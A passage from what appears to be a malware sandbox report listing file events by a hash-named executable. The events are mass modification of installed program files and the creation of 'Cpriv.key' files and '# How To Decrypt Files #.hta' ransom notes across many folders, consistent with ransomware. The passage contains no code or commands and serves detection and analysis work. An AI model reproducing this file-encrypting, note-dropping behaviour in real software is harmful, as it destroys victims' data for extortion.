Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR47B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\WindowsPowerShell\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1031\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\1.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21480_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BIZFORM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\it\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241041.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PPTIRM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.fr de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Foundry.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285820.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\PROOF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\RSSITEML.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\VIEW.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGATNGET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-today.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Synchronization Services\ADO.NET de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\CircleSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00100_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\attention.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099149.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00006_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183174.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\attention.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00932_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0283209.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02312_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15301_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\sv.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00092_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01180_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\AD.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft.NET\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239057.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIconSubpict.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.DEV.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Casual.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\init.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293844.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Services\verisign.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0149627.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14539_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14801_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BORDERBB.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107364.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107658.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXCEL.DEV.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePageScript.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\gui\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152590.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196354.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSACCESS_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\whitemenu.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00703L.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00513_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187921.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21306_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDCNCLS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ICE\ICE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105638.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238959.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\DELIMDOS.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IT.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\InfoPath.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02748G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OFFLINE.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304853.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15073_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MOR6INT.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.DEV_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01174_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02214_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBOXES.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\2.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00957_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01734_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21304_.GIF 